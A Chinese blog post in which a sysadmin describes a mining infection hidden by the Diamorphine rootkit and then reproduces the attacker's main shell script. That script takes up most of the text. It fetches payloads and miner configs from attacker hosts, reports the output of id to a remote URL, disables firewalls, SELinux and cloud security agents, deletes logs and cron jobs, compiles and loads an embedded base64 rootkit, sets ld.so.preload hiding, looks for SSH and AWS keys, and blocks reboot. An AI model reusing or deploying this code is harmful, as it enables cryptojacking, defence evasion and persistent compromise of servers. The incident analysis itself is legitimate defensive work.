Top有CPU占用但找不到占用的进程 (被病毒隐藏了)
2022-03-15 本文已影响0人
xun66
背景
今日一备用服务器上的服务停止,发现又感染挖矿病毒。且在寻找它的进程时十分波折,把一些过程记录一下。
太长不看版
病毒通过加载内核模块(diamorphine rootkit)隐藏了特定进程。病毒把自己的可执行文件命名为"[kswapd0]",并通过systemd开机自启。kswapd0是一个正常运行的系统中也存在的进程,但是病毒程序运行后在ps、top中只能看到正常的kswapd0进程,CPU占用0%。而且,在netstat中列出的出入方向连接,相应的PID都是-。若将其他任意可执行文件更改为这个名字,也会被隐藏。直接重置系统后,该问题解决。
排查过程
业务端口被病毒脚本定时kill,跑不起来,遂开始定位病毒进程。
发现系统响应缓慢,于是想着先运行top,看到ni占比50%(服务器共2核),意味着有一个CPU核心被低优先级进程稳定占据。但当我按CPU占用排序的时候,最高的是top本身,占用0.5%左右,没有更高的了。这时非常疑惑,怎么光有占用没有进程呢,用ps aux查看也没有。netstat看到有大量的出方向连接,而且相应的PID都是-,搜索资料也没有解释原因,正常情况下只有TIME_WAIT状态下的连接才可能出现-。
随后根据云报警中提供的攻击脚本链接下载了攻击脚本。找到几个systemd文件,去相应的位置看到了几个启动项。将他们禁用、停止,CPU占用率就恢复正常了。(这个挖矿程序还把自己的CPU使用率限制了一下,跟别的挖矿病毒很不一样)。但是此时一些定时脚本还活跃着(在/root/.profile中),每分钟都会执行一些特定工作,包括扫描其他的挖矿程序并kill掉。我们的服务端口有幸和某个挖矿程序一样,所以才总是启动不起来。
在启动项中看到ExcStart中指向的可执行文件位置,测试一下才发现这几个进程都是被隐藏的。这时候就意识到这应该是系统被hook了(其实可以从下面的脚本中看到是加载了diamorphine rootkit模块,见下文hid函数部分),也没必要再纠结进程到底是怎么隐藏的了,直接备份数据重装系统,结束。
补充
- rootkit LKM之 “Diamorphine” - jozxing
- 聊一聊Linux下进程隐藏的常见手法及侦测手段
- 那些年我们受到的网络攻击 - 这篇博客所描述的病毒应该是同款,但是症状好像不完全一样
- 贴上病毒主要脚本如下 (好像不能设置跳转,将就一下吧)
crontab_sh
# 入口脚本(省略了两处特别长的部分)
# 下载来源:h*t*t*p://107.189.3.150/b2f628/cronb.sh #####
#!/bin/bash
us=$(id)
curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
cd1 "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
ulimit -n 65535
export MOHOME=/var/tmp/.copydie
mkdir $MOHOME -p
if [ -f "$MOHOME/[kswapd0].log" ]
then
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" $MOHOME/[kswapd0].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
else
echo "miner process running"
exit 1
fi
else
echo "miner process not running"
fi
if [ -f "/usr/share/[crypto].log" ]
then
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" /usr/share/[crypto].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
else
echo "miner process running"
exit 1
fi
else
echo "miner process not running"
fi
if [ -f "/var/tmp/.system/[ext4].log" ]
then
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" /var/tmp/.system/[ext4].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
else
echo "miner process running"
exit 1
fi
else
echo "miner process not running"
fi
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
if ps aux | grep -i '[a]liyun'; then
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
export ARCH=amd64
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
MOxmrigMOD=http://bbq.zzhreceive.top/midd.jpg
MOxmrigSTOCK=http://bbq.zzhreceive.top/midd.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.peter44d
VERSION=2.9
function FixTheSystem(){
echo "begin FixTheSystem"
tntrecht -i /bin/chmod || chattr -i /bin/chmod
setfacl -m u::x /bin/chmod
tntrecht -i /bin/chattr || chattr -i /bin/chattr
chmod +x /bin/chattr || setfacl -m u::x /bin/chattr
SYSFILEARRAY=(/usr/bin/apt /usr/bin/apt-get /bin/yum /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit)
for SYSFILEBIN in ${SYSFILEARRAY[@]}; do
tntrecht -i $SYSFILEBIN
chattr -i $SYSFILEBIN
setfacl -m u::x /bin/chmod
setfacl -m u::x $SYSFILEBIN
chmod +x $SYSFILEBIN
chattr +i $SYSFILEBIN
tntrecht +i $SYSFILEBIN
done
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
done
setfacl -m u::x /bin/chmod
}
kill_miner_proc()
{
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
pkill -f biosetjenkins
rm -rf /usr/bin/config.json
rm /opt/atlassian/confluence/bin/1.sh
rm -rf /var/tmp/f41
>/etc/newsvc.sh
chattr +ia /etc/newsvc.sh
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
systemctl stop pnsd.service
sudo systemctl stop pastebin.service
# (此处省略很多rm和kill)
rm -rf /var/.httpd/*
rm -rf /etc/.httpd/*
rm -rf /var/tmp/.crypto/
rm -rf /var/tmp/.apache/*
rm -rf /usr/share/\[ddns\]*
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
kill_miner_proc
kill_sus_proc()
{
ps axf -o "pid"|while read procid
do
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
cat /proc/$procid/cmdline| grep -a -E "kswapd0"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo "don't kill"
fi
fi
done
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
cat /proc/$procid/cmdline| grep -a -E "kswapd0"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo "don't kill"
fi
done
}
kill_sus_proc
#FixTheSystem
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
SetupNameServers
chattr -iR /var/spool/cron/
tntrecht -iR /var/spool/cron/
crontab -r
function clean_cron(){
chattr -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
chattr -ia /etc/crontab
tntrecht -ia /etc/crontab
chattr -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
clean_cron
function lock_cron()
{
chattr -R +ia /var/spool/cron
tntrecht -R +ia /var/spool/cron
touch /etc/crontab
chattr +ia /etc/crontab
tntrecht +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
tntrecht -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
tntrecht -R +ia /etc/cron.d
}
lock_cron
function CheckAboutSomeKeys(){
if [ -f "/root/.ssh/id_rsa" ]
then
echo 'found: /root/.ssh/id_rsa'
fi
if [ -f "/home/*/.ssh/id_rsa" ]
then
echo 'found: /home/*/.ssh/id_rsa'
fi
if [ -f "/root/.aws/credentials" ]
then
echo 'found: /root/.aws/credentials'
fi
if [ -f "/home/*/.aws/credentials" ]
then
echo 'found: /home/*/.aws/credentials'
fi
}
CheckAboutSomeKeys
function back(){
if [ -f "/usr/bin/bioset" ]; then
echo 'FOUND: bioset'
else
echo 'MISSING: bioset'
loadthisfile http://oracle.zzhreceive.top/b/apa.jpg /usr/bin/bioset
chmod +x /usr/bin/bioset
cd /usr/bin && ./bioset
fi
}
function hid(){
DIA_TAR='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'
CHECK_WHOAMI=`whoami`
function old_school_hide(){
echo "bash hide"
}
function setup_dia(){
chattr -ia / /etc/ /tmp/ /var/ /var/tmp/ 2>/dev/null
chattr -R -ia /tmp/ /var/tmp/ 2>/dev/null
chmod 1777 /tmp/ /var/tmp/ 2>/dev/null
if type yum 2>/dev/null 1>/dev/null; then yum clean all ; yum -y install gcc make kmod ; yum -y install epel-release ;yum -y install elfutils-libelf-devel; yum list|grep kernel-devel|awk '{print $1}'|xargs yum -y install; fi
if type apt 2>/dev/null 1>/dev/null; then apt update --fix-missing ; apt-get -y install gcc make kmod ; apt-get -y install elfutils-libelf-devel;apt-get -y install linux-headers-$(uname -r) ; fi
if type apk 2>/dev/null 1>/dev/null; then apk update 2>/dev/null 1>/dev/null; apk add linux-headers 2>/dev/null ; fi
if [ ! -d "/var/tmp/.../dia/" ]; then mkdir -p /var/tmp/.../dia/ ; fi
echo $DIA_TAR | base64 -d > /var/tmp/.../dia/dia.tar.gz
tar xvf /var/tmp/.../dia/dia.tar.gz -C /var/tmp/.../dia/
rm -f /var/tmp/.../dia/dia.tar.gz
cd /var/tmp/.../dia/
kdir=/usr/src/kernels/$(uname -r)/
test -d /lib/modules/$(uname -r)/build
if [ $? -ne 0 ]
then
echo "build directory not exist,try to create soft link to /usr/src/kernels/"
test -d $kdir
if [ $? -ne 0 ]
then
echo "uname -r result is not eqel exist kernel version,try to link other version "
for kdir in $(ls -lrt /usr/src/kernels/|grep -v total|awk '{print $NF}')
do
cd /lib/modules/$(uname -r)/ && rm -rf build && ln -s /usr/src/kernels/$kdir/ ./build
cd /var/tmp/.../dia && make
done
else
cd /lib/modules/$(uname -r)/ && rm -rf build && ln -s /usr/src/kernels/$kdir/ ./build
cd /var/tmp/.../dia && make
fi
else
echo "build directory exist ,eqel kernel version"
cd /var/tmp/.../dia && make
fi
if [ -f "/var/tmp/.../dia/diamorphine.ko" ]; then
insmod diamorphine.ko
ROOTMO=`ps aux | grep -v grep | grep '/var/tmp/.copydie/\[kswapd0\].pid' | awk '{print $2}')`
if [ ! -z "$ROOTMO" ]; then kill -31 $ROOTMO ; fi
else echo 'build dia fail!'
old_school_hide
fi
}
if [ "$CHECK_WHOAMI" = "root" ]; then setup_dia ; fi
history -c
clear
}
function loadthisfile(){
GETFROM=$1
PUTITTO=$2
if [ -f "$PUTITTO" ]; then mchattr -i $PUTITTO 2>/dev/null 1>/dev/null ; chattr -i $PUTITTO 2>/dev/null 1>/dev/null ; tntrecht -i $PUTITTO 2>/dev/null 1>/dev/null ; rm -f $PUTITTO 2>/dev/null 1>/dev/null ; fi
curl -L --progress-bar $GETFROM -o $PUTITTO || cur -L --progress-bar $GETFROM -o $PUTITTO || cdl -L --progress-bar $GETFROM -o $PUTITTO || wget $GETFROM -O $PUTITTO || wge $GETFROM -O $PUTITTO || wdl $GETFROM -O $PUTITTO
}
function SecureTheSystem(){
if [ -f /usr/local/lib/kswapd0.so ]
then
echo "hide file exist" 2>/dev/null 1>/dev/null
grep kswapd0.so /etc/ld.so.preload
if [ $? != 0 ]
then
chattr -ia /etc/ld.so.preload|| tntrecht -ia /etc/ld.so.preload
echo -e "/usr/local/lib/pscan.so\n/usr/local/lib/bioset.so\n/usr/local/lib/mscan.so\n/usr/local/lib/kswapd0.so\n/usr/local/lib/zrab.so" >/etc/ld.so.preload
chattr +ia /etc/ld.so.preload|| tntrecht +ia /etc/ld.so.preload
else
echo "hided"
fi
else
grep kswapd0.so /etc/ld.so.preload
if [ $? != 0 ]
then
chattr -ia /etc/ld.so.preload|| tntrecht -ia /etc/ld.so.preload
echo -e "/usr/local/lib/pscan.so\n/usr/local/lib/bioset.so\n/usr/local/lib/mscan.so\n/usr/local/lib/kswapd0.so\n/usr/local/lib/zrab.so" >/etc/ld.so.preload
chattr +ia /etc/ld.so.preload|| tntrecht +ia /etc/ld.so.preload
else
echo "hided"
fi
loadthisfile http://oracle.zzhreceive.top/hide/hide.jpg /tmp/hide.tar && tar -xf /tmp/hide.tar -C /usr/local/lib/ && rm -f /tmp/hide.tar
chattr +ia /usr/local/lib/pscan.so || tntrecht +ia /usr/local/lib/pscan.so
chattr +ia /usr/local/lib/mscan.so || tntrecht +ia /usr/local/lib/mscan.so
chattr +ia /usr/local/lib/bioset.so || tntrecht +ia /usr/local/lib/bioset.so
chattr +ia /usr/local/lib/kswapd0.so || tntrecht +ia /usr/local/lib/kswapd0.so
chattr +ia /usr/local/lib/zrab.so || tntrecht +ia /usr/local/lib/zrab.so
fi
}
function LockDownTheSystem(){
LOCKDOWNARRAY=(shutdown reboot poweroff telinit)
for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do
LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null
chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null
#chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
done
chattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
LOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service")
for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; do
chattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null
> $LOCKDOWNFILE
rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null
done
}
function KILLMININGSERVICES(){
echo "[*] Removing previous miner (if any)"
killall -9 xmrig
echo "do KILLMININGSERVICES"
$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
#$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
killall -9 docker-update 2>/dev/null 1>/dev/null
rm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
killall -9 redis-backup 2>/dev/null 1>/dev/null
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
if [ ! -f /usr/bin/tntrecht ]; then
chattrbin=`which chattr`
cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod -x $chattrbin 2>/dev/null 1>/dev/null
tntrecht +i $chattrbin 2>/dev/null 1>/dev/null
fi
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig")
for tmpxmrigfile in ${tmpxmrig[@]}; do
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $tmpxmrigfile
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile 2>/dev/null 1>/dev/null
chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null
rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
ps ax| grep xmrig 2>/dev/null 1>/dev/null
done
fi
if [ -f /usr/sbin/cpumon ]; then
cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu")
for cpumonfile in ${cpumonxmr[@]}; do
chattr -i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null
rm -f $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $cpumonfile
chmod +x $cpumonfile 2>/dev/null 1>/dev/null
chattr +i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
killall $cpumonfile 2>/dev/null 1>/dev/null
done
fi
